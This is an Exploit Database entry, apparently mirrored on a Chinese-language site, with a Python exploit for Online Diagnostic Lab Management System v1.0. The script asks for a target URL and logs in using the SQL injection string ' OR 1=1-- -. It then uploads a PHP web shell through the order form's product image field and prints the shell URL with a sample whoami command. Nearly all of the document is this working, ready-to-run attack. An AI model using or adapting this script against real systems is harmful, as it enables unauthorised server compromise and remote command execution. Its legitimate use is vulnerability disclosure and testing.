Online Diagnostic Lab Management System v1.0 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 15 阅读

• 作者： yousef alraddadi
  日期： 2023-03-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51045/

• # Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
  # Google Dork: N/A
  # Date: 2022-9-23
  # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
  # Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
  # Tested on: windows 11 - XAMPP
  # Version: 1.0
  # Authentication Required: bypass login with sql injection
  
  #/usr/bin/python3
  
  import requests
  import os
  import sys
  import time
  import random
  
  # clean screen
  os.system("cls")
  os.system("clear")
  
  logo = '''
  ##################################################################
  ##
  #Exploit Script ( Online Diagnostic Lab Management System ) #
  ##
  ##################################################################
  '''
  print(logo)
  
  url = str(input("Enter website url : "))
  username = ("' OR 1=1-- -")
  password = ("test")
  
  req = requests.Session()
  
  target = url+"/diagnostic/login.php"
  data = {'username':username,'password':password}
  
  website = req.post(target,data=data)
  files = open("rev.php","w")
  payload = "<?php system($_GET['cmd']);?>"
  files.write(payload)
  files.close()
  
  hash = random.getrandbits(128)
  name_file = str(hash)+".php"
  if "Login Successfully" in website.text:
  
  print("[+] Login Successfully")
  website_1 = url+"/diagnostic/php_action/createOrder.php"
  
  upload_file = {
  "orderDate": (None,""),
  "clientName": (None,""),
  "clientContact" : (None,""),
  "productName[]" : (None,""),
  "rateValue[]" : (None,""),
  "quantity[]" : (None,""),
  "totalValue[]" : (None,""),
  "subTotalValue" : (None,""),
  "totalAmountValue" : (None,""),
  "discount" : (None,""),
  "grandTotalValue" : (None,""),
  "gstn" : (None,""),
  "vatValue" : (None,""),
  "paid" : (None,""),
  "dueValue" : (None,""),
  "paymentType" : (None,""),
  "paymentStatus" : (None,""),
  "paymentPlace" : (None,""),
  "productImage" : (name_file,open("rev.php","rb"))
  }
  
  up = req.post(website_1,files=upload_file)
  print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
  print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
  else:
  print("[-] Check username or password")